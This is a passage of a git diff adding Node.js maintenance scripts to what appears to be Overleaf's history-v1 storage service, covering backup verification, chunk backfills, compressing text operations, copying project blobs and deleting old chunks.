+ .catch(err => { + console.error('Error:', err) + process.exit(1) + }) + .finally(() => { + knex.destroy().catch(err => console.error('Error closing Postgres:', err)) + client.close().catch(err => console.error('Error closing MongoDB:', err)) + redis + .disconnect() + .catch(err => console.error('Error disconnecting Redis:', err)) + }) diff --git a/services/history-v1/storage/scripts/verify_backed_up_blobs.mjs b/services/history-v1/storage/scripts/verify_backed_up_blobs.mjs new file mode 100644 index 0000000..257238a --- /dev/null +++ b/services/history-v1/storage/scripts/verify_backed_up_blobs.mjs @@ -0,0 +1,153 @@ +// @ts-check +import { ObjectId } from 'mongodb' +import knex from '../lib/knex.js' +import { + batchedUpdate, + objectIdFromInput, + READ_PREFERENCE_SECONDARY, +} from '@overleaf/mongo-utils/batchedUpdate.js' +import { + GLOBAL_BLOBS, + loadGlobalBlobs, + makeProjectKey, +} from '../lib/blob_store/index.js' +import { + backedUpBlobs as backedUpBlobsCollection, + db, + client, +} from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import commandLineArgs from 'command-line-args' +import fs from 'node:fs' + +const projectsCollection = db.collection('projects') + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +function parseArgs() { + const PUBLIC_LAUNCH_DATE = new Date('2012-01-01T00:00:00Z') + const args = commandLineArgs([ + { + name: 'BATCH_RANGE_START', + type: String, + defaultValue: PUBLIC_LAUNCH_DATE.toISOString(), + }, + { + name: 'BATCH_RANGE_END', + type: String, + defaultValue: new Date().toISOString(), + }, + { + name: 'output', + type: String, + alias: 'o', + }, + ]) + const BATCH_RANGE_START = objectIdFromInput( + args['BATCH_RANGE_START'] + ).toString() + const BATCH_RANGE_END = objectIdFromInput(args['BATCH_RANGE_END']).toString() + if (!args['output']) { +
throw new Error('missing --output') + } + const OUTPUT_STREAM = fs.createWriteStream(args['output']) + + return { + BATCH_RANGE_START, + BATCH_RANGE_END, + OUTPUT_STREAM, + } +} + +const { BATCH_RANGE_START, BATCH_RANGE_END, OUTPUT_STREAM } = parseArgs() + +// We need to handle the start and end differently as ids of deleted projects are created at time of deletion. +if (process.env.BATCH_RANGE_START || process.env.BATCH_RANGE_END) { + throw new Error('use --BATCH_RANGE_START and --BATCH_RANGE_END') +} + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +async function processBatch(batch) { + if (gracefulShutdownInitiated) { + throw new Error('graceful shutdown: aborting batch processing') + } + + const N = batch.length + const firstId = batch[0]._id + const lastId = batch[N - 1]._id + const projectCursor = await projectsCollection.find( + { _id: { $gte: firstId, $lte: lastId } }, + { + projection: { _id: 1, 'overleaf.history.id': 1, lastUpdated: 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + } + ) + const projectMap = new Map() + for await (const project of projectCursor) { + projectMap.set(project._id.toString(), project) + } + for (const project of batch) { + const projectId = project._id.toString() + const projectRecord = projectMap.get(projectId) + if (!projectRecord) { + console.error(`project not found: ${projectId}`) + continue + } + if (!projectRecord.overleaf?.history?.id) { + console.error(`project missing history: ${projectId}`) + continue + } + const historyId = projectRecord.overleaf.history.id.toString() + const prefix = `${projectId},${projectRecord.lastUpdated.toISOString()},` + const hashes = project.blobs.map(blob => blob.toString('hex')) + const projectBlobHashes = hashes.filter(hash => !GLOBAL_BLOBS.has(hash)) + if (projectBlobHashes.length < hashes.length) { + console.warn( + `project ${projectId} has ${hashes.length - projectBlobHashes.length} global blobs` + ) + } + const rows = projectBlobHashes.map( + hash => prefix + makeProjectKey(historyId, hash) + '\n' + ) + OUTPUT_STREAM.write(rows.join('')) + } +} + +async function main() { + await loadGlobalBlobs() + OUTPUT_STREAM.write('projectId,lastUpdated,path\n') + await batchedUpdate( + backedUpBlobsCollection, + {}, + processBatch, + {}, + {}, + { BATCH_RANGE_START, BATCH_RANGE_END } + ) +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exitCode = 1 + }) + .finally(() => { + knex.destroy().catch(err => { + console.error('Error closing Postgres connection:', err) + }) + client.close().catch(err => console.error('Error closing MongoDB:', err)) + redis.disconnect().catch(err => { + console.error('Error disconnecting Redis:', err) + }) + }) diff --git a/services/history-v1/storage/scripts/verify_backup_blob.mjs b/services/history-v1/storage/scripts/verify_backup_blob.mjs new file mode 100644 index 0000000..504f907 --- /dev/null +++ b/services/history-v1/storage/scripts/verify_backup_blob.mjs @@ -0,0 +1,21 @@ +import logger from '@overleaf/logger' +import commandLineArgs from 'command-line-args' +import { verifyBlobs } from '../lib/backupVerifier.mjs' + +const { historyId, hashes } = commandLineArgs([ + { name: 'historyId', type: String }, + { name: 'hashes', type: String, multiple: true, defaultOption: true }, +]) + +if (!hashes || hashes.length === 0) { + throw new
Error('missing --hashes flag') +} + +try { + await verifyBlobs(historyId, hashes) + console.log('OK') + process.exit(0) +} catch (err) { + logger.err({ err }, 'failed to verify blob') + process.exit(1) +} diff --git a/services/history-v1/storage/scripts/verify_blob_backed_up_by_path_bulk.mjs b/services/history-v1/storage/scripts/verify_blob_backed_up_by_path_bulk.mjs new file mode 100644 index 0000000..c699b61 --- /dev/null +++ b/services/history-v1/storage/scripts/verify_blob_backed_up_by_path_bulk.mjs @@ -0,0 +1,177 @@ +import fs from 'node:fs' +import { makeProjectKey } from '../lib/blob_store/index.js' +import { backupPersistor, projectBlobsBucket } from '../lib/backupPersistor.mjs' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import commandLineArgs from 'command-line-args' +import OError from '@overleaf/o-error' +import assert from '../lib/assert.js' +import { client, projects } from '../lib/mongodb.js' +import { ObjectId } from 'mongodb' +import { setTimeout } from 'node:timers/promises' + +const { input, verbose } = commandLineArgs([ + { name: 'input', type: String }, + { name: 'verbose', type: Boolean, defaultValue: false }, +]) + +function parseCSVRow(row) { + const [path] = row.split(',') + const pathSegments = path.split('/') + const historyId = `${pathSegments[0]}${pathSegments[1]}${pathSegments[2]}` + .split('') + .reverse() + .join('') + + return { historyId, path, hash: `${pathSegments[3]}${pathSegments[4]}` } +} + +async function* readCSV(path) { + let fh + try { + fh = await fs.promises.open(path, 'r') + } catch (error) { + console.error(`Could not open file: ${error}`) + throw error + } + for await (const line of fh.readLines()) { + try { + const row = parseCSVRow(line) + yield row + } catch (error) { + console.error(error instanceof Error ? 
error.message : error) + console.log(`Skipping invalid row: ${line}`) + } + } +} + +class MissingDEKError extends OError {} +class InvalidHistoryIdError extends OError {} +class MissingProjectError extends OError {} +class MissingBlobError extends OError {} + +async function getProjectPersistor(historyId) { + try { + return await backupPersistor.forProjectRO( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + } catch (err) { + if (err instanceof NotFoundError) { + throw new MissingDEKError('dek does not exist', { historyId }, err) + } + throw err + } +} + +async function checkBlobExists(path, historyId) { + const persistor = await getProjectPersistor(historyId) + return await persistor.getObjectSize(projectBlobsBucket, path) +} + +let total = 0 +const errors = { + invalidProjectId: 0, + notBackedUpProjectId: 0, + missingBlob: 0, + notInMongo: 0, + unknown: 0, +} + +const notInMongoProjectIds = new Set() +const notBackedUpProjectIds = new Set() + +let stopping = false + +process.on('SIGTERM', () => { + console.log('SIGTERM received') + stopping = true +}) + +process.on('SIGINT', () => { + console.log('SIGINT received') + stopping = true +}) + +/** + * + * @param {string} historyId + * @param {string} path + * @param {string} hash + * @return {Promise<void>} + */ +async function checkPath(historyId, path, hash) { + try { + assert.mongoId(historyId) + } catch (error) { + throw new InvalidHistoryIdError('invalid history id', { historyId }) + } + if (notInMongoProjectIds.has(historyId)) { + throw new MissingProjectError('project not in mongo', { historyId }) + } + if (notBackedUpProjectIds.has(historyId)) { + throw new MissingDEKError('project not backed up', { historyId }) + } + + const project = await projects.findOne({ _id: new ObjectId(historyId) }) + if (!project) { + notInMongoProjectIds.add(historyId) + throw new MissingProjectError('project not in mongo', { historyId }) + } + try { + await checkBlobExists(path, historyId) + } catch (error) { + if (error instanceof NotFoundError) { + throw new MissingBlobError('missing blob', { historyId, hash }) + } + if (error instanceof MissingDEKError) { + notBackedUpProjectIds.add(historyId) + } + throw error + } +} + +for await (const line of readCSV(input)) { + if (stopping) break + total++ + if (total % 10_000 === 0) { + console.log(`checked ${total}`) + } + const { historyId, path, hash } = line + try { + await checkPath(historyId, path, hash) + if (verbose) { + console.log(`✓ Project ${historyId} has ${hash} backed up`) + } + } catch (error) { + if (error instanceof InvalidHistoryIdError) { + errors.invalidProjectId++ + console.warn(`invalid historyId ${historyId}`) + continue + } else if (error instanceof MissingProjectError) { + errors.notInMongo++ + console.warn(`✗ project ${historyId} not in mongo`) + continue + } else if (error instanceof MissingDEKError) { + errors.notBackedUpProjectId++ + console.error(`✗ Project DEK ${historyId} not found`) + continue + } else if (error instanceof MissingBlobError) { + errors.missingBlob++ + console.error(`✗ missing blob ${hash} from project ${historyId}`) + continue + } + errors.unknown++ + console.error(error) + } +} + +console.log(`total checked: ${total}`) +console.log(`invalid project id: ${errors.invalidProjectId}`) +console.log(`not found in mongo: ${errors.notInMongo}`) +console.log(`missing blob: ${errors.missingBlob}`) +console.log(`project not backed up: ${errors.notBackedUpProjectId}`) +console.log(`unknown errors: ${errors.unknown}`) + +await client.close() +await setTimeout(100)
+process.exit() diff --git a/services/history-v1/storage/scripts/verify_project.mjs b/services/history-v1/storage/scripts/verify_project.mjs new file mode 100644 index 0000000..3c26f9b --- /dev/null +++ b/services/history-v1/storage/scripts/verify_project.mjs @@ -0,0 +1,35 @@ +import commandLineArgs from 'command-line-args' +import { verifyProjectWithErrorContext } from '../lib/backupVerifier.mjs' +import knex from '../lib/knex.js' +import { client } from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import { setTimeout } from 'node:timers/promises' +import { loadGlobalBlobs } from '../lib/blob_store/index.js' + +const { historyId } = commandLineArgs([{ name: 'historyId', type: String }]) + +async function gracefulShutdown(code = process.exitCode) { + await knex.destroy() + await client.close() + await redis.disconnect() + await setTimeout(1_000) + process.exit(code) +} + +if (!historyId) { + console.error('missing --historyId') + process.exitCode = 1 + await gracefulShutdown() +} + +await loadGlobalBlobs() + +try { + await verifyProjectWithErrorContext(historyId) + console.log('OK') +} catch (error) { + console.error('error verifying', error) + process.exitCode = 1 +} finally { + await gracefulShutdown() +} diff --git a/services/history-v1/storage/scripts/verify_sampled_projects.mjs b/services/history-v1/storage/scripts/verify_sampled_projects.mjs new file mode 100644 index 0000000..a74a8b9 --- /dev/null +++ b/services/history-v1/storage/scripts/verify_sampled_projects.mjs @@ -0,0 +1,217 @@ +// @ts-check +import commandLineArgs from 'command-line-args' +import { + setWriteMetrics, + verifyProjectsCreatedInDateRange, + verifyRandomProjectSample, + verifyProjectsUpdatedInDateRange, +} from '../../backupVerifier/ProjectVerifier.mjs' +import knex from '../lib/knex.js' +import { client } from '../lib/mongodb.js' +import { setTimeout } from 'node:timers/promises' +import logger from '@overleaf/logger' +import { loadGlobalBlobs } from '../lib/blob_store/index.js' +import { getDatesBeforeRPO } from '../../backupVerifier/utils.mjs' +import { EventEmitter } from 'node:events' +import { mongodb } from '../index.js' +import redis from '../lib/redis.js' + +logger.logger.level('fatal') + +const usageMessage = [ + 'Usage: node verify_sampled_projects.mjs [--startDate <start>] [--endDate <end>] [--nProjects <n>] [--verbose] [--usage] [--writeMetrics] [--concurrency <n>] [--strategy <range|random|recent>]', + 'strategy: defaults to "range"; startDate and endDate are required for "range" strategy', +].join('\n') + +/** + * Gracefully shut down the process + * @param code + * @return {Promise<void>} + */ +async function gracefulShutdown(code = process.exitCode) { + await knex.destroy() + await client.close() + await redis.disconnect() + await setTimeout(1_000) + process.exit(code) +} + +const STATS = { + verifiable: 0, + unverifiable: 0, +} + +/** + * @typedef {Object} CLIOptions + * @property {(signal: EventEmitter) => Promise<VerificationJobStatus>} projectVerifier + * @property {boolean} verbose + */ + +/** + * @typedef {import('../../backupVerifier/types.d.ts').VerificationJobStatus} VerificationJobStatus + */ + +/** + * + * @return {CLIOptions} + */ +function getOptions() { + const { + startDate, + endDate, + concurrency, + writeMetrics, + verbose, + nProjects, + strategy, + usage, + } = commandLineArgs([ + { name: 'startDate', type: String }, + { name: 'endDate', type: String }, + { name: 'concurrency', type: Number, defaultValue: 1 }, + { name: 'verbose', type: Boolean, defaultValue: false }, + { 
name: 'nProjects', type: Number, defaultValue: 10 }, + { name: 'usage', type: Boolean, defaultValue: false }, + { name: 'writeMetrics', type: Boolean, defaultValue: false }, + { name: 'strategy', type: String, defaultValue: 'range' }, + ]) + + if (usage) { + console.log(usageMessage) + process.exit(0) + } + + if (!['range', 'random', 'recent'].includes(strategy)) { + throw new Error(`Invalid strategy: ${strategy}`) + } + + setWriteMetrics(writeMetrics) + + switch (strategy) { + case 'random': + console.log('Verifying random projects') + return { + verbose, + projectVerifier: signal => verifyRandomProjectSample(nProjects, signal), + } + case 'recent': + return { + verbose, + projectVerifier: async signal => { + const { startDate, endDate } = getDatesBeforeRPO(3 * 3600) + return await verifyProjectsUpdatedInDateRange( + startDate, + endDate, + nProjects, + signal + ) + }, + } + case 'range': + default: { + if (!startDate || !endDate) { + throw new Error(usageMessage) + } + const start = Date.parse(startDate) + const end = Date.parse(endDate) + if (Number.isNaN(start)) { + throw new Error(`Invalid start date: ${startDate}`) + } + + if (Number.isNaN(end)) { + throw new Error(`Invalid end date: ${endDate}`) + } + if (verbose) { + console.log(`Verifying from ${startDate} to ${endDate}`) + console.log(`Concurrency: ${concurrency}`) + } + STATS.ranges = 0 + return { + projectVerifier: signal => + verifyProjectsCreatedInDateRange({ + startDate: new Date(start), + endDate: new Date(end), + projectsPerRange: nProjects, + concurrency, + signal, + }), + verbose, + } + } + } +} + +/** + * @type {CLIOptions} + */ +let options +try { + options = getOptions() +} catch (error) { + console.error(error) + process.exitCode = 1 + await gracefulShutdown(1) + process.exit() // just here so the type checker knows that the process will exit +} + +const { projectVerifier, verbose } = options + +if (verbose) { + logger.logger.level('debug') +} + +/** + * + * @param {Array<string>} array + * @param {string} matchString + * @return {*} + */ +function sumStringInstances(array, matchString) { + return array.reduce((total, string) => { + return string === matchString ? 
total + 1 : total + }, 0) +} + +/** + * + * @param {VerificationJobStatus} stats + */ +function displayStats(stats) { + console.log(`Verified projects: ${stats.verified}`) + console.log(`Total projects sampled: ${stats.total}`) + if (stats.errorTypes.length > 0) { + console.log('Errors:') + for (const error of new Set(stats.errorTypes)) { + console.log(`${error}: ${sumStringInstances(stats.errorTypes, error)}`) + } + } +} + +const shutdownEmitter = new EventEmitter() + +shutdownEmitter.on('shutdown', async () => { + await gracefulShutdown() +}) + +process.on('SIGTERM', () => { + shutdownEmitter.emit('shutdown') +}) + +process.on('SIGINT', () => { + shutdownEmitter.emit('shutdown') +}) + +await loadGlobalBlobs() + +try { + const stats = await projectVerifier(shutdownEmitter) + displayStats(stats) + console.log(`completed`) +} catch (error) { + console.error(error) + console.log('completed with errors') + process.exitCode = 1 +} finally { + console.log('shutting down') + await gracefulShutdown() +} diff --git a/services/history-v1/storage/tasks/backfill_start_version.js b/services/history-v1/storage/tasks/backfill_start_version.js new file mode 100644 index 0000000..fd6d624 --- /dev/null +++ b/services/history-v1/storage/tasks/backfill_start_version.js @@ -0,0 +1,109 @@ +const commandLineArgs = require('command-line-args') +const BPromise = require('bluebird') +const timersPromises = require('node:timers/promises') + +const { knex, historyStore } = require('..') + +const MAX_POSTGRES_INTEGER = 2147483647 +const DEFAULT_BATCH_SIZE = 1000 +const DEFAULT_CONCURRENCY = 1 +const MAX_RETRIES = 10 +const RETRY_DELAY_MS = 5000 + +async function main() { + const options = parseOptions() + let batchStart = options.minId + while (batchStart <= options.maxId) { + const chunks = await getChunks(batchStart, options.maxId, options.batchSize) + if (chunks.length === 0) { + // No results. We're done. + break + } + const batchEnd = chunks[chunks.length - 1].id + await processBatch(chunks, options) + console.log(`Processed chunks ${batchStart} to ${batchEnd}`) + batchStart = batchEnd + 1 + } +} + +function parseOptions() { + const args = commandLineArgs([ + { name: 'min-id', type: Number, defaultValue: 1 }, + { + name: 'max-id', + type: Number, + defaultValue: MAX_POSTGRES_INTEGER, + }, + { name: 'batch-size', type: Number, defaultValue: DEFAULT_BATCH_SIZE }, + { name: 'concurrency', type: Number, defaultValue: DEFAULT_CONCURRENCY }, + ]) + return { + minId: args['min-id'], + maxId: args['max-id'], + batchSize: args['batch-size'], + concurrency: args.concurrency, + } +} + +async function getChunks(minId, maxId, batchSize) { + const chunks = await knex('chunks') + .where('id', '>=', minId) + .andWhere('id', '<=', maxId) + .orderBy('id') + .limit(batchSize) + return chunks +} + +async function processBatch(chunks, options) { + let retries = 0 + while (true) { + const results = await BPromise.map(chunks, processChunk, { + concurrency: options.concurrency, + }) + const failedChunks = results + .filter(result => !result.success) + .map(result => result.chunk) + if (failedChunks.length === 0) { + // All chunks processed. Carry on. + break + } + + // Some projects failed. Retry. + retries += 1 + if (retries > MAX_RETRIES) { + console.log('Too many retries processing chunks. 
Giving up.') + process.exit(1) + } + console.log( + `Retrying chunks: ${failedChunks.map(chunk => chunk.id).join(', ')}` + ) + await timersPromises.setTimeout(RETRY_DELAY_MS) + chunks = failedChunks + } +} + +async function processChunk(chunk) { + try { + const rawHistory = await historyStore.loadRaw( + chunk.doc_id.toString(), + chunk.id + ) + const startVersion = chunk.end_version - rawHistory.changes.length + await knex('chunks') + .where('id', chunk.id) + .update({ start_version: startVersion }) + return { chunk, success: true } + } catch (err) { + console.error(`Failed to process chunk ${chunk.id}:`, err.stack) + return { chunk, success: false } + } +} + +main() + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/tasks/compress_changes.js b/services/history-v1/storage/tasks/compress_changes.js new file mode 100644 index 0000000..9ae7ade --- /dev/null +++ b/services/history-v1/storage/tasks/compress_changes.js @@ -0,0 +1,107 @@ +/** + * Compress changes for projects that have too many text operations. + * + * Usage: + * + * node tasks/compress_changes.js CSV_FILE + * + * where CSV_FILE contains a list of project ids in the first column + */ + +const fs = require('node:fs') +const BPromise = require('bluebird') +const { History } = require('overleaf-editor-core') +const { historyStore, chunkStore } = require('..') + +const CONCURRENCY = 10 + +async function main() { + const filename = process.argv[2] + const projectIds = await readCsv(filename) + const chunks = [] + for (const projectId of projectIds) { + const chunkIds = await chunkStore.getProjectChunkIds(projectId) + chunks.push(...chunkIds.map(id => ({ id, projectId }))) + } + let totalCompressed = 0 + await BPromise.map( + chunks, + async chunk => { + try { + const history = await getHistory(chunk) + const numCompressed = compressChanges(history) + if (numCompressed > 0) { + await storeHistory(chunk, history) + console.log( + `Compressed project ${chunk.projectId}, chunk ${chunk.id}` + ) + } + totalCompressed += numCompressed + } catch (err) { + console.log(err) + } + }, + { concurrency: CONCURRENCY } + ) + console.log('CHANGES:', totalCompressed) +} + +async function readCsv(filename) { + const csv = await fs.promises.readFile(filename, 'utf-8') + const lines = csv.trim().split('\n') + const projectIds = lines.map(line => line.split(',')[0]) + return projectIds +} + +async function getHistory(chunk) { + const rawHistory = await historyStore.loadRaw(chunk.projectId, chunk.id) + const history = History.fromRaw(rawHistory) + return history +} + +async function storeHistory(chunk, history) { + const rawHistory = history.toRaw() + await historyStore.storeRaw(chunk.projectId, chunk.id, rawHistory) +} + +function compressChanges(history) { + let numCompressed = 0 + for (const change of history.getChanges()) { + const newOperations = compressOperations(change.operations) + if (newOperations.length !== change.operations.length) { + numCompressed++ + } + change.setOperations(newOperations) + } + return numCompressed +} + +function compressOperations(operations) { + if (!operations.length) return [] + + const newOperations = [] + let currentOperation = operations[0] + for (let operationId = 1; operationId < operations.length; operationId++) { + const nextOperation = operations[operationId] + if (currentOperation.canBeComposedWith(nextOperation)) { + currentOperation = currentOperation.compose(nextOperation) + } else { + // currentOperation and 
nextOperation cannot be composed. Push the + // currentOperation and start over with nextOperation. + newOperations.push(currentOperation) + currentOperation = nextOperation + } + } + newOperations.push(currentOperation) + + return newOperations +} + +main() + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/tasks/copy_project_blobs.js b/services/history-v1/storage/tasks/copy_project_blobs.js new file mode 100755 index 0000000..c3511bf --- /dev/null +++ b/services/history-v1/storage/tasks/copy_project_blobs.js @@ -0,0 +1,294 @@ +#!/usr/bin/env node + +const { promisify } = require('node:util') +const BPromise = require('bluebird') +const commandLineArgs = require('command-line-args') +const config = require('config') +const fs = require('node:fs') +const readline = require('node:readline') +const { History } = require('overleaf-editor-core') +const { knex, historyStore, persistor } = require('..') +const projectKey = require('../lib/project_key') + +const MAX_POSTGRES_INTEGER = 2147483647 +const DEFAULT_BATCH_SIZE = 1000 +const MAX_RETRIES = 10 +const RETRY_DELAY_MS = 5000 + +// Obtain a preconfigured GCS client through a non-documented property of +// object-persistor. Sorry about that. We need the GCS client because we use +// operations that are not implemented in object-persistor. +const gcsClient = persistor.storage +const globalBucket = gcsClient.bucket(config.get('blobStore.globalBucket')) +const projectBucket = gcsClient.bucket(config.get('blobStore.projectBucket')) +const delay = promisify(setTimeout) + +async function main() { + const options = commandLineArgs([ + { name: 'global-blobs', type: String }, + { name: 'min-project-id', type: Number, defaultValue: 1 }, + { + name: 'max-project-id', + type: Number, + defaultValue: MAX_POSTGRES_INTEGER, + }, + { name: 'batch-size', type: Number, defaultValue: DEFAULT_BATCH_SIZE }, + { name: 'concurrency', type: Number, defaultValue: 1 }, + ]) + if (!options['global-blobs']) { + console.error( + 'You must specify a global blobs file with the --global-blobs option' + ) + process.exit(1) + } + const globalBlobs = await readGlobalBlobs(options['global-blobs']) + const minProjectId = options['min-project-id'] + const maxProjectId = options['max-project-id'] + const batchSize = options['batch-size'] + const concurrency = options.concurrency + console.log(`Keeping ${globalBlobs.size} global blobs`) + await run({ globalBlobs, minProjectId, maxProjectId, batchSize, concurrency }) + console.log('Done.') +} + +async function readGlobalBlobs(filename) { + const stream = fs.createReadStream(filename) + const reader = readline.createInterface({ + input: stream, + crlfDelay: Infinity, + }) + const blobs = new Set() + for await (const line of reader) { + blobs.add(line.trim()) + } + return blobs +} + +async function run(options) { + const { globalBlobs, minProjectId, maxProjectId, batchSize, concurrency } = + options + let batchStart = minProjectId + while (batchStart <= maxProjectId) { + let projectIds = await getProjectIds(batchStart, maxProjectId, batchSize) + if (projectIds.length === 0) { + break + } + const batchEnd = projectIds[projectIds.length - 1] + console.log(`Processing projects ${batchStart} to ${batchEnd}`) + const chunkIdsByProject = await getChunkIdsByProject(projectIds) + + let retries = 0 + while (true) { + const results = await BPromise.map( + projectIds, + async projectId => + await processProject( + projectId, + 
chunkIdsByProject.get(projectId), + globalBlobs + ), + { concurrency } + ) + const failedProjectIds = results + .filter(result => !result.success) + .map(result => result.projectId) + if (failedProjectIds.length === 0) { + // All projects were copied successfully. Carry on. + break + } + + // Some projects failed. Retry. + retries += 1 + if (retries > MAX_RETRIES) { + console.log( + `Too many retries processing projects ${batchStart} to ${batchEnd}. Giving up.` + ) + process.exit(1) + } + console.log(`Retrying projects: ${failedProjectIds.join(', ')}`) + await delay(RETRY_DELAY_MS) + projectIds = failedProjectIds + } + + // Set up next batch + batchStart = batchEnd + 1 + } +} + +async function getProjectIds(minProjectId, maxProjectId, batchSize) { + const projectIds = await knex('chunks') + .distinct('doc_id') + .where('doc_id', '>=', minProjectId) + .andWhere('doc_id', '<=', maxProjectId) + .orderBy('doc_id') + .limit(batchSize) + .pluck('doc_id') + return projectIds +} + +async function getChunkIdsByProject(projectIds) { + const chunks = await knex('chunks') + .select('id', { projectId: 'doc_id' }) + .where('doc_id', 'in', projectIds) + const chunkIdsByProject = new Map() + for (const projectId of projectIds) { + chunkIdsByProject.set(projectId, []) + } + for (const chunk of chunks) { + chunkIdsByProject.get(chunk.projectId).push(chunk.id) + } + return chunkIdsByProject +} + +async function processProject(projectId, chunkIds, globalBlobs) { + try { + const blobHashes = await getBlobHashes(projectId, chunkIds) + const projectBlobHashes = blobHashes.filter(hash => !globalBlobs.has(hash)) + const gcsSizesByHash = new Map() + for (const blobHash of projectBlobHashes) { + const blobSize = await copyBlobInGcs(projectId, blobHash) + if (blobSize != null) { + gcsSizesByHash.set(blobHash, blobSize) + } + } + const dbSizesByHash = await copyBlobsInDatabase( + projectId, + projectBlobHashes + ) + compareBlobSizes(gcsSizesByHash, dbSizesByHash) + return { projectId, success: true } + } catch (err) { + console.error(`Failed to process project ${projectId}:`, err.stack) + return { projectId, success: false } + } +} + +function compareBlobSizes(gcsSizesByHash, dbSizesByHash) { + // Throw an error if the database doesn't report as many blobs as GCS + if (dbSizesByHash.size !== gcsSizesByHash.size) { + throw new Error( + `the database reported ${dbSizesByHash.size} blobs copied, but GCS reported ${gcsSizesByHash.size} blobs copied` + ) + } + + const mismatches = [] + for (const [hash, dbSize] of dbSizesByHash.entries()) { + if (gcsSizesByHash.get(hash) !== dbSize) { + mismatches.push(hash) + } + } + if (mismatches.length > 0) { + throw new Error(`blob size mismatch for hashes: ${mismatches.join(', ')}`) + } +} + +async function getHistory(projectId, chunkId) { + const rawHistory = await historyStore.loadRaw(projectId, chunkId) + const history = History.fromRaw(rawHistory) + return history +} + +async function getBlobHashes(projectId, chunkIds) { + const blobHashes = new Set() + for (const chunkId of chunkIds) { + const history = await getHistory(projectId, chunkId) + history.findBlobHashes(blobHashes) + } + return Array.from(blobHashes) +} + +async function copyBlobInGcs(projectId, blobHash) { + const globalBlobKey = [ + blobHash.slice(0, 2), + blobHash.slice(2, 4), + blobHash.slice(4), + ].join('/') + const projectBlobKey = [ + projectKey.format(projectId), + blobHash.slice(0, 2), + blobHash.slice(2), + ].join('/') + const globalBlobObject = globalBucket.file(globalBlobKey) + const projectBlobObject = 
projectBucket.file(projectBlobKey) + + // Check if the project blob exists + let projectBlobMetadata = null + try { + ;[projectBlobMetadata] = await projectBlobObject.getMetadata() + } catch (err) { + if (err.code !== 404) { + throw err + } + } + + // Check that the blob exists + let globalBlobMetadata = null + try { + ;[globalBlobMetadata] = await globalBlobObject.getMetadata() + } catch (err) { + if (err.code !== 404) { + throw err + } + } + + if (projectBlobMetadata) { + // Project blob already exists. Compare the metadata if the global blob + // also exists and return early. + if ( + globalBlobMetadata != null && + (globalBlobMetadata.size !== projectBlobMetadata.size || + globalBlobMetadata.md5Hash !== projectBlobMetadata.md5Hash) + ) { + throw new Error( + `Project blob ${blobHash} in project ${projectId} doesn't match global blob` + ) + } + return null + } + + await globalBlobObject.copy(projectBlobObject) + + // Paranoid check that the copy went well. The getMetadata() method returns + // an array, with the metadata in first position. + ;[projectBlobMetadata] = await projectBlobObject.getMetadata() + if ( + globalBlobMetadata.size !== projectBlobMetadata.size || + globalBlobMetadata.md5Hash !== projectBlobMetadata.md5Hash + ) { + throw new Error(`Failed to copy blob ${blobHash} to project ${projectId})`) + } + + return parseInt(projectBlobMetadata.size, 10) +} + +async function copyBlobsInDatabase(projectId, blobHashes) { + const blobSizesByHash = new Map() + if (blobHashes.length === 0) { + return blobSizesByHash + } + const binaryBlobHashes = blobHashes.map(hash => Buffer.from(hash, 'hex')) + const result = await knex.raw( + `INSERT INTO project_blobs ( + project_id, hash_bytes, byte_length, string_length + ) + SELECT ?, hash_bytes, byte_length, string_length + FROM blobs + WHERE hash_bytes IN (${binaryBlobHashes.map(_ => '?').join(',')}) + ON CONFLICT (project_id, hash_bytes) DO NOTHING + RETURNING hash_bytes, byte_length`, + [projectId, ...binaryBlobHashes] + ) + for (const row of result.rows) { + blobSizesByHash.set(row.hash_bytes.toString('hex'), row.byte_length) + } + return blobSizesByHash +} + +main() + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/tasks/delete_old_chunks.js b/services/history-v1/storage/tasks/delete_old_chunks.js new file mode 100644 index 0000000..e120111 --- /dev/null +++ b/services/history-v1/storage/tasks/delete_old_chunks.js @@ -0,0 +1,36 @@ +#!/usr/bin/env node + +'use strict' + +const commandLineArgs = require('command-line-args') +const { chunkStore } = require('../') + +async function deleteOldChunks(options) { + const deletedChunksTotal = await chunkStore.deleteOldChunks(options) + console.log(`Deleted ${deletedChunksTotal} old chunks`) +} + +exports.deleteOldChunks = deleteOldChunks + +if (require.main === module) { + const options = commandLineArgs([ + { name: 'batch-size', type: Number }, + { name: 'max-batches', type: Number }, + { name: 'min-age', type: Number }, + { name: 'timeout', type: Number }, + { name: 'verbose', type: Boolean, alias: 'v', defaultValue: false }, + ]) + deleteOldChunks({ + batchSize: options['batch-size'], + maxBatches: options['max-batches'], + timeout: options.timeout, + minAgeSecs: options['min-age'], + }) + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) +} diff --git a/services/history-v1/storage/tasks/fix_duplicate_versions.js 
b/services/history-v1/storage/tasks/fix_duplicate_versions.js new file mode 100755 index 0000000..a7db4b2 --- /dev/null +++ b/services/history-v1/storage/tasks/fix_duplicate_versions.js @@ -0,0 +1,156 @@ +#!/usr/bin/env node + +'use strict' + +const commandLineArgs = require('command-line-args') +const { chunkStore } = require('..') + +main() + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) + +async function main() { + const opts = commandLineArgs([ + { name: 'project-ids', type: String, multiple: true, defaultOption: true }, + { name: 'save', type: Boolean, defaultValue: false }, + { name: 'help', type: Boolean, defaultValue: false }, + ]) + if (opts.help || opts['project-ids'] == null) { + console.log('Usage: fix_duplicate_versions [--save] PROJECT_ID...') + process.exit() + } + for (const projectId of opts['project-ids']) { + await processProject(projectId, opts.save) + } + if (!opts.save) { + console.log('\nThis was a dry run. Re-run with --save to persist changes.') + } +} + +async function processProject(projectId, save) { + console.log(`Project ${projectId}:`) + const chunk = await 